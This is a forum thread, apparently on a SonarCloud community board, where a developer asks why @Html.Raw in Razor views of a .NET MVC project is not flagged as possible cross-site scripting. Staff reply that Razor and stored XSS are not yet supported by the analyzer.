Cross-site scripting detection in (MVC) project

We have an (MVC) project on .Net 4.8. I would have expected that anywhere we use @Html.Raw in a razor template that SonarCloud would flag a potential XSS. For example:

@Html.Raw( Model.InstructionsHtml )

If the model value is coming from the database, how does Sonar know if it’s tainted or not? Shouldn’t this at least appear in Security Hotspot?

I am using SonarScanner.MSBuild.exe with the default options for the project that was created in the interface.

Hi @steve_c,

What is the format/type of your Model.InstructionsHtml variable ?



it’s a string

And is it filled with some query string value or something else ?

According to this rule, the taint analysis should appears when the InstructionHtml variable is written itself.

As mentioned, it’s coming a value stored in the database. Shouldn’t this at least be flagged as a security hotspot since we don’t know if the stored values are tainted?

Hello Steve

  • Razor language is not supported for the moment. So even if some values are tainted without a doubt SonarQube/SonarCloud is not able to raise issues.

  • Stored XSSs are also not supported, because of the risk of significant False-Positives rate, but your suggestion about raising a hotspot might be interesting.

Thank you for pointing out these problems, we will try to handle them, it can take time because it involves major work on the products.

Don’t hesitate in the future if you see some possible improvements to the rules.